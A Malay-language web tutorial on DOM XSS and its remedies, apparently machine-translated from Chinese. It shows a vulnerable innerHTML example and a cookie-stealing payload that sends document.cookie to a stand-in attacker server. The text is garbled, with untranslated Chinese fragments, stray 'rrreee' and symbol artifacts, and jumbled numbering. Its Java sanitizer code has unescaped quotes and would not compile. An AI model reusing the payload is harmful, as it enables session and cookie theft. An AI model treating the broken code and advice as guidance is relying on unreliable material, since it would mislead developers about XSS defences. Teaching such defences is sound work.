Serangan DOM XSS di Java dan cara membetulkannya

Serangan DOM XSS di Java dan cara membetulkannya

Pengenalan:
Dengan perkembangan pesat Internet, pembangunan aplikasi web menjadi semakin biasa. Walau bagaimanapun, isu keselamatan yang datang dengannya sentiasa membimbangkan pemaju. Salah satunya ialah serangan DOM XSS. Serangan DOM XSS ialah cara untuk melaksanakan serangan skrip merentas tapak dengan memanipulasi "Model Objek Dokumen" (DOM) halaman web. Artikel ini akan memperkenalkan definisi, bahaya dan cara membaiki serangan DOM XSS.

1. Definisi dan bahaya serangan DOM XSS:
Serangan DOM XSS ialah serangan skrip merentas tapak yang mengeksploitasi interaksi antara kod JavaScript pelanggan dan DOM. Penyerang boleh mengubah suai kandungan halaman web dan melaksanakan kod JavaScript berniat jahat dengan memanipulasi DOM, dan kod ini dilaksanakan dalam penyemak imbas pengguna, jadi ia sangat berbahaya.

Serangan DOM XSS boleh menyebabkan kemudaratan berikut:

1. Mencuri maklumat pengguna sensitif: Penyerang boleh mengubah suai DOM untuk memintas maklumat sensitif seperti maklumat log masuk pengguna, nombor kad bank, dll., menyebabkan kebocoran privasi pengguna.
2. Menyebarkan pautan hasad: Penyerang boleh mengubah suai DOM, memasukkan pautan hasad, mendorong pengguna untuk mengklik dan kemudian membimbing pengguna ke tapak web pancingan data atau memuat turun perisian hasad.
3. Merampas sesi pengguna: Penyerang boleh mengubah suai DOM, merampas sesi pengguna dan menyebabkan pengguna melakukan operasi yang tidak diingini, seperti memindahkan wang, membuat kenyataan yang tidak sesuai, dsb.

2. Contoh serangan DOM XSS:
Untuk lebih memahami prinsip serangan DOM XSS, contoh mudah akan digunakan untuk menunjukkan proses serangan.

Andaikan terdapat halaman web di mana pengguna boleh memasukkan maklumat peribadi dan ia akan dipaparkan pada halaman web. Berikut ialah contoh kod:

<!DOCTYPE html>
<html>
<head>
    <title>DOM XSS Attack Example</title>
</head>
<body>
    <h1>Personal Information</h1>
    <div id="info"></div>
    <script>
        var input = "<script>alert('You have been hacked.');</script>";
        document.getElementById("info").innerHTML = input;
    </script> 
</body>
</html>

Dalam kod di atas, apa sahaja yang dimasukkan pengguna akan dimasukkan terus ke dalam halaman web DOM tanpa sebarang penapisan dan pengesahan. Ini memberi peluang kepada penyerang untuk melakukan serangan DOM XSS.

Penyerang boleh membina input hasad, seperti:

<script>var stealData = new Image();stealData.src="http://attackerserver.com/steal?data="+document.cookie;</script>

Input hasad ini menyuntik skrip untuk mencuri maklumat kuki pengguna dan menghantarnya ke pelayan penyerang.

Apabila pengguna melawat halaman web ini dengan input berniat jahat, skrip dilaksanakan dan maklumat kuki pengguna dicuri.

3. Kaedah pembaikan untuk serangan DOM XSS:
Untuk mengelakkan serangan DOM XSS, pembangun boleh menggunakan kaedah pembaikan berikut:

1. Penapisan dan pengesahan input: Tapis dan sahkan input kandungan oleh pengguna untuk memastikan bahawa hanya sah yang diterima masukan. Anda boleh menggunakan fungsi pengesahan input tertentu, seperti ungkapan biasa Java, untuk menapis beberapa aksara berbahaya, teg HTML, kod JavaScript, dsb.

Berikut ialah contoh kod:

public static String sanitizeInput(String input) {
    // 过滤掉危险字符、HTML标签和JavaScript代码
    return input.replaceAll("[<>"'&]", "");
}

String input = "<script>var stealData = new Image();stealData.src="http://attackerserver.com/steal?data="+document.cookie;</script>";
String sanitizedInput = sanitizeInput(input);

Menapis input pengguna dengan memanggil kaedah sanitizeInput() boleh menghalang suntikan skrip berniat jahat.

2. Gunakan API selamat: Apabila menggunakan API, cuba gunakan API selamat, seperti menggunakan textContent dan bukannya innerHTML, setAttribute() sebaliknya innerHTML dsb. untuk mengurangkan kemungkinan serangan. textContent替代innerHTML，setAttribute()替代innerHTML等，以减少攻击的可能性。

以下是示例代码：

var input = "<script>var stealData = new Image();stealData.src="http://attackerserver.com/steal?data="+document.cookie;</script>";
document.getElementById("info").textContent = input;

使用textContent来替代innerHTML

Berikut ialah contoh kod:
3. rrreee
Gunakan textContent dan bukannya innerHTML untuk mengelakkan suntikan skrip.

Gunakan rangka kerja selamat: Gunakan beberapa rangka kerja keselamatan yang disahkan secara meluas, seperti ESAPI (Enterprise Security API), Spring Security, dsb. Rangka kerja ini menyediakan pembangun dengan pelbagai ciri keselamatan, termasuk penapisan input, pengekodan output, pengurusan sesi, dll., untuk membantu mencegah serangan DOM XSS.

🎜🎜Ringkasan: 🎜Serangan DOM XSS ialah cara untuk melaksanakan serangan skrip merentas tapak dengan memanipulasi DOM halaman web. Ia boleh membawa kepada kemudaratan seperti membocorkan privasi pengguna, menyebarkan pautan berniat jahat dan merampas sesi pengguna. Untuk mengelakkan serangan DOM XSS, pembangun boleh menggunakan pembetulan seperti penapisan dan pengesahan input, menggunakan API selamat dan menggunakan rangka kerja selamat. Dengan mengukuhkan kesedaran keselamatan dan penggunaan teknologi keselamatan yang rasional, kami boleh melindungi keselamatan aplikasi web dengan lebih baik. 🎜

Atas ialah kandungan terperinci Serangan DOM XSS di Java dan cara membetulkannya. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!